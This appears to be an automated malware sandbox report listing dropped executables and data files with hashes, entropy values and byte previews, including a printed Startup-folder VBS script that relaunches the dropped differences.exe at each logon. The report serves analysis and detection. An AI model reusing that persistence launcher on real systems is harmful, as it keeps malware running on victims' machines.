                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1185280
                                                                                                                                                Entropy (8bit):5.103277382949175
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:oIhHXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZHsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:D0ECC6B51550FF9659D2CCD839CBD13E
                                                                                                                                                SHA1:C5E656432721BE11B5609EF0C2DCD47DF013EE1C
                                                                                                                                                SHA-256:60E1A20585869D056DA31347DF6B7905BF3449DCAA24158C84B43A84406AEB2A
                                                                                                                                                SHA-512:FB2E6D2CBDC24521EBEED4B151F00D9FE7A055ECA86D83CF168F1B4DDCAF7FCFAA375C67771DE79A3B137C2A93FBA7FBB9F0AE590E57D46ED070CF4D8B6D3217
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................9j.... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1531904
                                                                                                                                                Entropy (8bit):5.421214630800603
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:c8oREwt2ioQ3J+RisqjnhMgeiCl7G0nehbGZpbD:c8oRpoFmDmg27RnWGj
                                                                                                                                                MD5:374B18BE5020C65A518AA12AC475CA3E
                                                                                                                                                SHA1:C187ACC644AFA906083F36284781CE08A6A7F291
                                                                                                                                                SHA-256:40FC3E48F272B87859BBDA83630CA97D86B360A6D115C7117916C9216C52F90F
                                                                                                                                                SHA-512:F2FDA897DF0221FE37B277CCF508FA67911CFF51E737B607A34A6BC7736B9B4570C566E629290B1975E7CB4B48CF5050C1A0523C4B4A34C3480DF78F19A3805B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@.......................................... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1341952
                                                                                                                                                Entropy (8bit):5.238587484657839
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:/f8HQlDMxHwJ07w8sqjnhMgeiCl7G0nehbGZpbD:/kHQlqwJ0DDmg27RnWGj
                                                                                                                                                MD5:670DFE734C28EDD64354C0AF67C27A12
                                                                                                                                                SHA1:79605C24E6075BEB169C7EA3FC40895616688D01
                                                                                                                                                SHA-256:CAC3823F22A8012565DB607C6E2D107AA81EAD4627A41AC95EF563439236A648
                                                                                                                                                SHA-512:3D9082EEE0650FC7F944AE1E1AEDCC952A69A143BBBC1A5A0DE44614A6EE50CCA35C8BCEBFF477F0C33763800DCFC7C4B56E768C79480FA8FE973318492171D8
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@.......................................... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...P.......@...:..............@...................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\aut252C.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):197382
                                                                                                                                                Entropy (8bit):7.978975431817648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:+SOKoJPTB79RI/WXs8zXMxVa19sGTd+tVLpOHy8fPYWFfQY:+SboJPVp+uXsRxgPFuppO1PYWFoY
                                                                                                                                                MD5:66E2BD1E26E599FFB38600216BC3854B
                                                                                                                                                SHA1:7909678F09AA823A8A6479C402979E808115C71C
                                                                                                                                                SHA-256:A120388AE974719B7876271E7C8EA30A9040C101C3EB67F085A6F7EAF0747D89
                                                                                                                                                SHA-512:DCAF815478E1759490921C3CF4BAAA6EA46819E6219FC62E3E1AC057DA6BAA8F7210F9BEC671F9EB36E489D2254968FD687F81041CE60D8AD8621EF29C6C2C12
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:EA06..8..D95..N.8.T(S]..Y.... ...J..j......}Z...L.M.^J_...Esw(uBW#.Qg.Y..o>.V.s.ejwj.....}Z.9.EapXU.w<.Wm..|.....U......r{.aF.Hu...M'.....?N.d...4h...7......WK....K...o..#.9............1.EhSX...Y.}.V..Mm.w..&.K...U..[.[.0..p...xx(`..d.3.*.....8...u....B...5..R.Z.P..).>..H..*..&(.%..Q.....c*..f.Z.......0.O..^.N @....9t.....'..&..._.X... .`...|7j.j.l.I...X.A>.....)..M.<.[..q-..T6....[.....j.........SJ........3.N(T......;....K.x.g.........e...fujFj.B..t..f.......-....er...[..c.8<6W+..W..:...1._4..jkB.Qv....M....c....l.8.....Fx...g.+..|.).&..<$s.Uv...mc5o.....T...*..."SZ..{..}.s......}+. .....{u..%...5;.]w.Z.*A^.W.\}....S.[:...f.U(@...C..S..;u&.........C .N...P.Mo..V.!..F)6=~..n.....O...:.5...Y...U...U.u..7..di8...YZ.p.4..;.Y..#...^..r..j.O...]*3I.>-.....|..S..0}N..:.wf.IM.,.."...Z...R.....YQ..y.k.*.&.q..K.{....hSZ.;a6..aT..n.S..hU......k=...!...=..k#^...k...Z..o.....Yq..?.If..9{.0..A.F...~.M.........u.....v.+UV.Y.J....cD..wj ...'A.u..3.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\aut2F1F.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):197382
                                                                                                                                                Entropy (8bit):7.978975431817648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:+SOKoJPTB79RI/WXs8zXMxVa19sGTd+tVLpOHy8fPYWFfQY:+SboJPVp+uXsRxgPFuppO1PYWFoY
                                                                                                                                                MD5:66E2BD1E26E599FFB38600216BC3854B
                                                                                                                                                SHA1:7909678F09AA823A8A6479C402979E808115C71C
                                                                                                                                                SHA-256:A120388AE974719B7876271E7C8EA30A9040C101C3EB67F085A6F7EAF0747D89
                                                                                                                                                SHA-512:DCAF815478E1759490921C3CF4BAAA6EA46819E6219FC62E3E1AC057DA6BAA8F7210F9BEC671F9EB36E489D2254968FD687F81041CE60D8AD8621EF29C6C2C12
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:EA06..8..D95..N.8.T(S]..Y.... ...J..j......}Z...L.M.^J_...Esw(uBW#.Qg.Y..o>.V.s.ejwj.....}Z.9.EapXU.w<.Wm..|.....U......r{.aF.Hu...M'.....?N.d...4h...7......WK....K...o..#.9............1.EhSX...Y.}.V..Mm.w..&.K...U..[.[.0..p...xx(`..d.3.*.....8...u....B...5..R.Z.P..).>..H..*..&(.%..Q.....c*..f.Z.......0.O..^.N @....9t.....'..&..._.X... .`...|7j.j.l.I...X.A>.....)..M.<.[..q-..T6....[.....j.........SJ........3.N(T......;....K.x.g.........e...fujFj.B..t..f.......-....er...[..c.8<6W+..W..:...1._4..jkB.Qv....M....c....l.8.....Fx...g.+..|.).&..<$s.Uv...mc5o.....T...*..."SZ..{..}.s......}+. .....{u..%...5;.]w.Z.*A^.W.\}....S.[:...f.U(@...C..S..;u&.........C .N...P.Mo..V.!..F)6=~..n.....O...:.5...Y...U...U.u..7..di8...YZ.p.4..;.Y..#...^..r..j.O...]*3I.>-.....|..S..0}N..:.wf.IM.,.."...Z...R.....YQ..y.k.*.&.q..K.{....hSZ.;a6..aT..n.S..hU......k=...!...=..k#^...k...Z..o.....Yq..?.If..9{.0..A.F...~.M.........u.....v.+UV.Y.J....cD..wj ...'A.u..3.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\autE8B0.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):197382
                                                                                                                                                Entropy (8bit):7.978975431817648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:+SOKoJPTB79RI/WXs8zXMxVa19sGTd+tVLpOHy8fPYWFfQY:+SboJPVp+uXsRxgPFuppO1PYWFoY
                                                                                                                                                MD5:66E2BD1E26E599FFB38600216BC3854B
                                                                                                                                                SHA1:7909678F09AA823A8A6479C402979E808115C71C
                                                                                                                                                SHA-256:A120388AE974719B7876271E7C8EA30A9040C101C3EB67F085A6F7EAF0747D89
                                                                                                                                                SHA-512:DCAF815478E1759490921C3CF4BAAA6EA46819E6219FC62E3E1AC057DA6BAA8F7210F9BEC671F9EB36E489D2254968FD687F81041CE60D8AD8621EF29C6C2C12
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:EA06..8..D95..N.8.T(S]..Y.... ...J..j......}Z...L.M.^J_...Esw(uBW#.Qg.Y..o>.V.s.ejwj.....}Z.9.EapXU.w<.Wm..|.....U......r{.aF.Hu...M'.....?N.d...4h...7......WK....K...o..#.9............1.EhSX...Y.}.V..Mm.w..&.K...U..[.[.0..p...xx(`..d.3.*.....8...u....B...5..R.Z.P..).>..H..*..&(.%..Q.....c*..f.Z.......0.O..^.N @....9t.....'..&..._.X... .`...|7j.j.l.I...X.A>.....)..M.<.[..q-..T6....[.....j.........SJ........3.N(T......;....K.x.g.........e...fujFj.B..t..f.......-....er...[..c.8<6W+..W..:...1._4..jkB.Qv....M....c....l.8.....Fx...g.+..|.).&..<$s.Uv...mc5o.....T...*..."SZ..{..}.s......}+. .....{u..%...5;.]w.Z.*A^.W.\}....S.[:...f.U(@...C..S..;u&.........C .N...P.Mo..V.!..F)6=~..n.....O...:.5...Y...U...U.u..7..di8...YZ.p.4..;.Y..#...^..r..j.O...]*3I.>-.....|..S..0}N..:.wf.IM.,.."...Z...R.....YQ..y.k.*.&.q..K.{....hSZ.;a6..aT..n.S..hU......k=...!...=..k#^...k...Z..o.....Yq..?.If..9{.0..A.F...~.M.........u.....v.+UV.Y.J....cD..wj ...'A.u..3.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\autEE7C.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):197382
                                                                                                                                                Entropy (8bit):7.978975431817648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:+SOKoJPTB79RI/WXs8zXMxVa19sGTd+tVLpOHy8fPYWFfQY:+SboJPVp+uXsRxgPFuppO1PYWFoY
                                                                                                                                                MD5:66E2BD1E26E599FFB38600216BC3854B
                                                                                                                                                SHA1:7909678F09AA823A8A6479C402979E808115C71C
                                                                                                                                                SHA-256:A120388AE974719B7876271E7C8EA30A9040C101C3EB67F085A6F7EAF0747D89
                                                                                                                                                SHA-512:DCAF815478E1759490921C3CF4BAAA6EA46819E6219FC62E3E1AC057DA6BAA8F7210F9BEC671F9EB36E489D2254968FD687F81041CE60D8AD8621EF29C6C2C12
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:EA06..8..D95..N.8.T(S]..Y.... ...J..j......}Z...L.M.^J_...Esw(uBW#.Qg.Y..o>.V.s.ejwj.....}Z.9.EapXU.w<.Wm..|.....U......r{.aF.Hu...M'.....?N.d...4h...7......WK....K...o..#.9............1.EhSX...Y.}.V..Mm.w..&.K...U..[.[.0..p...xx(`..d.3.*.....8...u....B...5..R.Z.P..).>..H..*..&(.%..Q.....c*..f.Z.......0.O..^.N @....9t.....'..&..._.X... .`...|7j.j.l.I...X.A>.....)..M.<.[..q-..T6....[.....j.........SJ........3.N(T......;....K.x.g.........e...fujFj.B..t..f.......-....er...[..c.8<6W+..W..:...1._4..jkB.Qv....M....c....l.8.....Fx...g.+..|.).&..<$s.Uv...mc5o.....T...*..."SZ..{..}.s......}+. .....{u..%...5;.]w.Z.*A^.W.\}....S.[:...f.U(@...C..S..;u&.........C .N...P.Mo..V.!..F)6=~..n.....O...:.5...Y...U...U.u..7..di8...YZ.p.4..;.Y..#...^..r..j.O...]*3I.>-.....|..S..0}N..:.wf.IM.,.."...Z...R.....YQ..y.k.*.&.q..K.{....hSZ.;a6..aT..n.S..hU......k=...!...=..k#^...k...Z..o.....Yq..?.If..9{.0..A.F...~.M.........u.....v.+UV.Y.J....cD..wj ...'A.u..3.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\avenses

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):210944
                                                                                                                                                Entropy (8bit):7.804440353519537
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:c5SxhPZBqu018ISR0EwC9VC01Ly00wNC8lsX5hYMrlkpg:2eTs8ISR0E391f0wNCUWprlGg
                                                                                                                                                MD5:62C62E710D458E88E6829E7BC84193DE
                                                                                                                                                SHA1:1C07A2F13C81B820FCA588F41219995279093CA0
                                                                                                                                                SHA-256:B60D259CB7254914EAAEACAD19D89E9CF9C4B31A6783EB36F505D7C64F233EE4
                                                                                                                                                SHA-512:3B2565B8C233AD7DB2E8019FEE3614D2FBB64D44913432F363400EB021BA1263DB2FF6B706BEF033A5681BC031618FD80A7F9F38A29DCDEE55D0DC1DBA49BB58
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:...YUSZ8FPB5..YY.SZ8BPB5.JYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5.JYYXL.6B.K.n.X..r.P+#bE=%>+7>z[#>,Z;j;<v!/Vb9,....y;<>]l]O?kJYYVSZ8*@..c;.'z".Fn!.K}i&'i".FI..Kd;.'z".F.!.K}i7'J".Fps+K.;.'dp!Fo!.K.#:1z".FBPB5OJYYVSZ8BPB5....VSZ8..B5.K]Y".ZhBPB5OJYY.Sy9IQK5O.XYV.[8BPB5`.YYVCZ8B.C5OJ.YVCZ8BRB5JJYYVSZ8GPB5OJYYV.Y8BTB5.q[YTSZ.BPR5OZYYVSJ8B@B5OJYYFSZ8BPB5OJYY.FX8.PB5O*[Y6E[8BPB5OJYYVSZ8BPB5OJYYVSZ8..C5SJYYVSZ8BPB5OJYYVSZ8BPB5OJYY.^X8.PB5OJYYVSZ8B.C5.KYYVSZ8BPB5OJYYVSZ8BPB5OJYYx'?@6PB5W.XYVCZ8B.C5ONYYVSZ8BPB5OJYYvSZXl"&T;+YY.>Z8B.C5O$YYV.[8BPB5OJYYVSZ8.PBua.8-7SZ8.`B5Oj[YVEZ8BZ@5OJYYVSZ8BPB5.JY.x!)J!PB5/\XYV3X8BHC5Oj[YVSZ8BPB5OJYY.SZxBPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYY

                                                                                                                                                C:\Users\user\AppData\Local\Temp\x.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1696256
                                                                                                                                                Entropy (8bit):7.476661384902613
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:du6J3NO0c+JY5UZ+XC0kGso6Fal1PcweksaTzWYtsqjnhMgeiCl7G0nehbGZpbD:vU0c++OCvkGs9Falrx2YRDmg27RnWGj
                                                                                                                                                MD5:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                SHA1:93F41C6378A5FA7954A9312C085923202452D5FD
                                                                                                                                                SHA-256:D9487FBFB0064873D0F48625AE5ECBFBEACCF17AC809DE32A1B7A0FB872079F0
                                                                                                                                                SHA-512:CA88C862DAA03981BBA44EA4C92F44663DC1005165AC08B21878DBF550A1B29823CBD148D522F6A5996ACF08AA8460A2B6C1E82EA82B57B910B6E8A20FE6C0A2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...j.Lg.........."..........".......}............@..........................P......X.........@.......@.....................L...|....p..Pz...........................+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...Pz...p...|..................@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\subpredicate\differences.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1696256
                                                                                                                                                Entropy (8bit):7.476661384902613
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:du6J3NO0c+JY5UZ+XC0kGso6Fal1PcweksaTzWYtsqjnhMgeiCl7G0nehbGZpbD:vU0c++OCvkGs9Falrx2YRDmg27RnWGj
                                                                                                                                                MD5:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                SHA1:93F41C6378A5FA7954A9312C085923202452D5FD
                                                                                                                                                SHA-256:D9487FBFB0064873D0F48625AE5ECBFBEACCF17AC809DE32A1B7A0FB872079F0
                                                                                                                                                SHA-512:CA88C862DAA03981BBA44EA4C92F44663DC1005165AC08B21878DBF550A1B29823CBD148D522F6A5996ACF08AA8460A2B6C1E82EA82B57B910B6E8A20FE6C0A2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...j.Lg.........."..........".......}............@..........................P......X.........@.......@.....................L...|....p..Pz...........................+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...Pz...p...|..................@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\31d53b0537b9f482.bin

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12320
                                                                                                                                                Entropy (8bit):7.982554097909734
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:5hcaSn0ZS8AtD7BjBaBAh0xuzojNAaZYCBdhkIHQO//:5hnSn0lAthRzopXLLHF//
                                                                                                                                                MD5:43E70AC7DAC1FBF869BD2A8541AAC665
                                                                                                                                                SHA1:982564D8B294AB223CF3945D2818DF15462FF5C6
                                                                                                                                                SHA-256:63A634144023DDC69C018565C667B34D439BF54711D846B29B8BA8D24594BAFB
                                                                                                                                                SHA-512:031E6BA84EBB7B6533FD57EECC28597F2C02CA5B8975096C0BDA3264E209ADE01C68BF3439EE0A1E50180DDF8AE8159A9F10F4B7DCE8B01C32AE5131977049F3
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:$...>. .uT.uL<.3.....<..r..k..UqV.<.$."n..../..@.%..Dq.Uv6..|l...q...0...E...1....l.l<w.P.......G...$...U.].h.`%WXR..4...H(........).....l.~6...>3.a!.PSL_m.u..<i.~.g..7.....4...........`k..Ay.%Eg...]....2.&tS.......b3.[..&....Z.I._W'...T.....wE.z..M.8k!...$E..}...}...7C.....{k...I..]...V..... ......OD...a".U,%....@b.0..>.raw.q..t.."U*4.FK. .g....D...`..P*....-".(N?F..$.p...`....5I..iP..{.L..H.pK[.e......&.T.[..8b../..y..w*.z..e....{....{1z...Q.R..).ft.....+.<..2S.g..,6...<..=W).....Qj......$L...(P.'.o/bU..>..$..$...../H...'.+.I..........1Ci:.#....8>....`......".o.v..]..v.7.8t....g.]#YN...+.&F....S :.U.F.Z....Rl.4....7........k.B....*V.$..3Hm...Nh..2E."aa...KeT.....y..;#..2.5(.........0........j.K.d.....5..h.04...~....}k.{..D7....KI..,+.............f..l*.T../........L.C..>.`'.k..#...5v.......r..B$q..!,..b-...,yCR_...s|.....x2.....E.4..7/w.b...\U..?..:J|...;...j.....d.....9..>(.G9.%d...D.....L...0.7....$.Mr3.':*k.E..m.r...m.$.~R\.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):288
                                                                                                                                                Entropy (8bit):3.4118971589590945
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1WlQPKlTGF50qGZlm6nriIM8lfQVn:DsO+vNloRKQ1ziGF5Ebm4mA2n
                                                                                                                                                MD5:4A8D35BBA7DA5134B9DCA0E880E2A49C
                                                                                                                                                SHA1:A2DDFF2E8C1F9FE36A69F478892010268259256F
                                                                                                                                                SHA-256:3D3F57E13EBAAF87A64DD031C5CB19406C2EC15DB1681EB90F92DD6A23092C07
                                                                                                                                                SHA-512:DD4C6CD805D004D74E7CBD002F0DCFDC8114105BA43C8371C950F3E706ED320557D63F8339212D09FF658A32CEF1700C938066709FEA4F0494877B46C581A454
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.u.b.p.r.e.d.i.c.a.t.e.\.d.i.f.f.e.r.e.n.c.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                                                                                                C:\Windows\DtcInstall.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):2313
                                                                                                                                                Entropy (8bit):5.1333300352699744
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786k:Z070s0Y0q0mF7Dm5z
                                                                                                                                                MD5:2B9E547A157A374A3CEA4001B060F23D
                                                                                                                                                SHA1:C9B3DE33329C0F92F118B9D3AB107470986BE557
                                                                                                                                                SHA-256:4BF9FFC798C6F60E26C162C52952F2644DD32BAE27497B3197DAEB809E55DBB1
                                                                                                                                                SHA-512:BFF4DBE10E47485FC6BB7D7DF12C1E76868C0E01FEA691A4EF6D077188C14662F5BA9DD46BA317B0FB5AD4A477213C658826FB0CCEFEE04CA11F3F7A07AE5BA5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

                                                                                                                                                C:\Windows\SysWOW64\perfhost.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1150976
                                                                                                                                                Entropy (8bit):5.038905144050007
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:uOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:uOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:44C283F4BD1BAB81C2FA725DEF4F6B81
                                                                                                                                                SHA1:5CF8BC0B72FF64DA224E13FB3ECBE84A17287908
                                                                                                                                                SHA-256:F2F321BE61F94E25B5109545BC6209F393D326ECC2904D911D06D0EA728FA8F5
                                                                                                                                                SHA-512:240B048527BFF04BC2B1918098F04D4684A0F1079EA689366ECC58A21D805867FC3E1946D55A986210A867E11EDA45E4C0512116A451C1D0AE1D23AD47E0CEC2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@.................................._........... ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...P.......@...P..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\AppVClient.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):1930240
                                                                                                                                                Entropy (8bit):7.5357528601040205
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:gQW9BKNX0IPgiVMBOuyDmg27RnWGj1Dmg27RnWGj:g0EI4MD527BWGBD527BWG
                                                                                                                                                MD5:D57EFB62378CB9FE5ABA5C4735D90C00
                                                                                                                                                SHA1:AC500CCEC6614E3476E9A206617F0CA52D67264E
                                                                                                                                                SHA-256:1483EFEFCCFC89BF59C92DA27ED053D1978F3AB1D4F93183608B0E10BCA83A54
                                                                                                                                                SHA-512:DAF58FF98E257B87D40379AAE4951A95D29737C559EE8442899A1B703016E670DF6616BD6DA4485ED2D7E7C0F4052718AC5CFD14796D337DBC9F9FFC20EFFAAD
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
